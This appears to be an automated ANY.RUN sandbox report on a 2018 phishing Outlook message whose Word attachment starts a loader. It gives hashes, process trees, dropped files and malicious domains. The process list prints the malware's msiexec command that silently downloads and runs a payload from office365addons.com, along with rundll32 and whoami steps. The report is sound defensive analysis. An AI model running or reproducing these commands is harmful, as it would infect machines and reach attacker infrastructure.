analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Apparently phishing mail as attached.msg

Full analysis: https://app.any.run/tasks/fdab6536-aeb7-4082-aee1-b1e1b9db01ba
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: December 18, 2018, 14:56:21
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
exe-to-msi
loader
Indicators:
MIME: application/vnd.ms-outlook
File info: CDFV2 Microsoft Outlook Message
MD5:

CF3E41C882A9305A7A60E93D101E2701

SHA1:

57973071D5A43D04CA961D4DA086417089E63039

SHA256:

408CF21EADCFD7E790617892DDB3270D8AAE1A58906A9C1DE9BAFEE1426AD78D

SSDEEP:

3072:59yhDpDcmE6ZGJsWPsdkzOXghxdlAIUD2HW7yryrgDuMOlMLTg4R1aLmWyWCNQNR:2Xghxdlp+2DDLLTgcsLLy

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Uses Microsoft Installer as loader

      • WINWORD.EXE (PID: 2620)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2620)
    • Changes settings of System certificates

      • rundll32.exe (PID: 3008)
    • Downloads executable files from the Internet

      • msiexec.exe (PID: 3820)
  • SUSPICIOUS

    • Reads Internet Cache Settings

      • OUTLOOK.EXE (PID: 2980)
    • Creates files in the user directory

      • OUTLOOK.EXE (PID: 2980)
    • Application launched itself

      • WINWORD.EXE (PID: 2620)
    • Starts Microsoft Office Application

      • WINWORD.EXE (PID: 2620)
      • OUTLOOK.EXE (PID: 2980)
    • Drop ExeToMSI Application

      • msiexec.exe (PID: 3820)
    • Executable content was dropped or overwritten

      • msiexec.exe (PID: 3820)
      • MSI9C5E.tmp (PID: 3284)
    • Starts CMD.EXE for commands execution

      • wscript.exe (PID: 2284)
      • rundll32.exe (PID: 3008)
    • Executes scripts

      • MSI9C5E.tmp (PID: 3284)
    • Uses RUNDLL32.EXE to load library

      • cmd.exe (PID: 4076)
    • Adds / modifies Windows certificates

      • rundll32.exe (PID: 3008)
    • Uses WHOAMI.EXE to obtaining logged on user information

      • cmd.exe (PID: 2408)
  • INFO

    • Dropped object may contain Bitcoin addresses

      • OUTLOOK.EXE (PID: 2980)
    • Reads Microsoft Office registry keys

      • OUTLOOK.EXE (PID: 3380)
      • OUTLOOK.EXE (PID: 2980)
      • WINWORD.EXE (PID: 3352)
      • WINWORD.EXE (PID: 2620)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 2620)
    • Starts application with an unusual extension

      • msiexec.exe (PID: 3820)
    • Writes to a desktop.ini file (may be used to cloak folders)

      • msiexec.exe (PID: 3820)
    • Application was dropped or rewritten from another process

      • MSI9C5E.tmp (PID: 3284)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.msg | Outlook Message (41.3)
.oft | Outlook Form Template (24.1)
.doc | Microsoft Word document (18.6)
.doc | Microsoft Word document (old ver.) (11)
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
46
Monitored processes
12
Malicious processes
3
Suspicious processes
4

Behavior graph

Click at the process to see the details
start drop and start outlook.exe outlook.exe no specs winword.exe no specs winword.exe no specs msiexec.exe no specs msiexec.exe msi9c5e.tmp wscript.exe no specs cmd.exe no specs rundll32.exe cmd.exe no specs whoami.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2980"C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE" /f "C:\Users\admin\AppData\Local\Temp\Apparently phishing mail as attached.msg"C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Outlook
Version:
14.0.6025.1000
3380"C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE" -EmbeddingC:\Program Files\Microsoft Office\Office14\OUTLOOK.EXEsvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Outlook
Exit code:
0
Version:
14.0.6025.1000
2620"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\JJYQMBXI\New Doc 2018-12-06 (11).doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEOUTLOOK.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3352"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /EmbeddingC:\Program Files\Microsoft Office\Office14\WINWORD.EXEWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
2892"C:\Windows\System32\msiexec.exe" back=12 error=reboot /i http://office365addons.com/service /q OnLoad="c:\windows\system32\cmd.exe" Aciqy=¶µ±VIks1C:\Windows\System32\msiexec.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Exit code:
0
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
3820C:\Windows\system32\msiexec.exe /VC:\Windows\system32\msiexec.exe
services.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows® installer
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
3284"C:\Windows\Installer\MSI9C5E.tmp"C:\Windows\Installer\MSI9C5E.tmp
msiexec.exe
User:
admin
Company:
rsdfa company
Integrity Level:
MEDIUM
Description:
rasdfa Application
Exit code:
0
Version:
1.3.3
2284"wscript" "C:\Users\admin\AppData\Local\Temp\sht.vbs"C:\Windows\system32\wscript.exeMSI9C5E.tmp
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
4076"C:\Windows\System32\cmd.exe" /c C:\Users\admin\AppData\Local\Temp\zxa.batC:\Windows\System32\cmd.exewscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3008rundll32.exe C:\Users\admin\AppData\Local\Temp\helpobj.dat, mainC:\Windows\system32\rundll32.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows host process (Rundll32)
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
3 935
Read events
3 048
Write events
0
Delete events
0

Modification events

No data
Executable files
3
Suspicious files
6
Text files
35
Unknown types
8

Dropped files

PID
Process
Filename
Type
2980OUTLOOK.EXEC:\Users\admin\AppData\Local\Temp\CVR6A15.tmp.cvr
MD5:
SHA256:
2980OUTLOOK.EXEC:\Users\admin\AppData\Local\Temp\~DF4DF5128506244070.TMP
MD5:
SHA256:
3380OUTLOOK.EXEC:\Users\admin\AppData\Local\Temp\CVR9CAE.tmp.cvr
MD5:
SHA256:
2980OUTLOOK.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\JJYQMBXI\New Doc 2018-12-06 (11) (2).doc\:Zone.Identifier:$DATA
MD5:
SHA256:
2620WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRA52A.tmp.cvr
MD5:
SHA256:
2620WINWORD.EXEC:\Users\admin\AppData\Local\Temp\OICE_F4D1EB1B-037D-4F6E-B781-91B736314043.0\C411FC05.doc\:Zone.Identifier:$DATA
MD5:
SHA256:
2980OUTLOOK.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$rmalEmail.dotmpgc
MD5:19A6C8B0F2174EFE8B77447E849644E0
SHA256:E634F0F40B7EE3A1CC4764E322037E718580D2E4FEC16941574103CB7E69F094
3352WINWORD.EXEC:\Users\admin\AppData\Local\Temp\OICE_F4D1EB1B-037D-4F6E-B781-91B736314043.0\msoB0F1.tmpcompressed
MD5:1181E3A11C0BECD81FF25DDEBB68BBAB
SHA256:24FA8C93F98890CE68F47319C96DE313FDB395328D6AB6A5CA811CE0CE4B6956
2980OUTLOOK.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\JJYQMBXI\New Doc 2018-12-06 (11).docdocument
MD5:ACDFD626D941107C5174515475E4C66F
SHA256:DF507558EDC4E8BE5999603DB2FEB1D69D3EAB6AA72B7089B1C2B5E7EE6D146D
2980OUTLOOK.EXEC:\Users\admin\AppData\Local\Microsoft\Outlook\mapisvc.inftext
MD5:48DD6CAE43CE26B992C35799FCD76898
SHA256:7BFE1F3691E2B4FB4D61FBF5E9F7782FBE49DA1342DBD32201C2CC8E540DBD1A
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
4
DNS requests
3
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2980
OUTLOOK.EXE
GET
64.4.26.155:80
http://config.messenger.msn.com/config/msgrconfig.asmx?op=GetOlcConfig
US
whitelisted
3820
msiexec.exe
GET
200
185.17.123.165:80
http://office365addons.com/service
RU
executable
396 Kb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2980
OUTLOOK.EXE
64.4.26.155:80
config.messenger.msn.com
Microsoft Corporation
US
whitelisted
3008
rundll32.exe
37.252.5.139:443
vesecase.com
DE
malicious
3820
msiexec.exe
185.17.123.165:80
office365addons.com
Leaseweb Deutschland GmbH
RU
malicious

DNS requests

Domain
IP
Reputation
config.messenger.msn.com
  • 64.4.26.155
whitelisted
office365addons.com
  • 185.17.123.165
malicious
vesecase.com
  • 37.252.5.139
malicious

Threats

PID
Process
Class
Message
3820
msiexec.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Malicious behavior by evader Trojan.Script.Generic
3820
msiexec.exe
Misc activity
SUSPICIOUS [PTsecurity] Using msiexec.exe for Downloading non-MSI file
3820
msiexec.exe
Potential Corporate Privacy Violation
POLICY [PTsecurity] Executable application_x-msi Download
No debug info